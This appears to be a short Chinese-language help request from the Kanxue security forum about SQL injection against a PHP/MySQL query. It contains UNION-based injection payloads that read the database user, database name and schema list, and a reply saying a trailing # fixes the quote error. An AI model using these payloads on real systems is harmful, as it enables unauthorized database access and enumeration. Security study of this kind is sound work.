[求助]mysql 注入语句的单引号处理-WEB安全-看雪-安全社区|安全招聘|kanxue.com

小李世界

2018-3-30 16:08

1697

PHP语句，select * from data where number <='{$number}'

当 number 为 201803-29' and 1=2 union select 1,2,3,4,5,concat(current_user(),' ',database())'

下面是可以的 select * from data where number <= '201803-29' and 1=2 union select 1,2,3,4,5,concat(current_user(),' ',database())''

当 number 为 201803-29' and 1=2 union select 1,2,3,4,5,SCHEMA_NAME from information_schema.SCHEMATA'

最终语句为 select * from data where number <='201803-29' and 1=2 union select 1,2,3,4,5,SCHEMA_NAME from information_schema.SCHEMATA''

执行时，会因为末尾两个单引号''出错，怎么弄

最后于 2018-3-30 16:09 被小李世界编辑，原因：

收藏・0

免费・0

支持

最新回复 (1)
小李世界雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	小李世界 2 楼解决了，加了# 2018-3-30 16:14 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

小李世界

发帖

回帖

RANK

他的文章

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (1)
小李世界雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	小李世界 2 楼解决了，加了# 2018-3-30 16:14 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复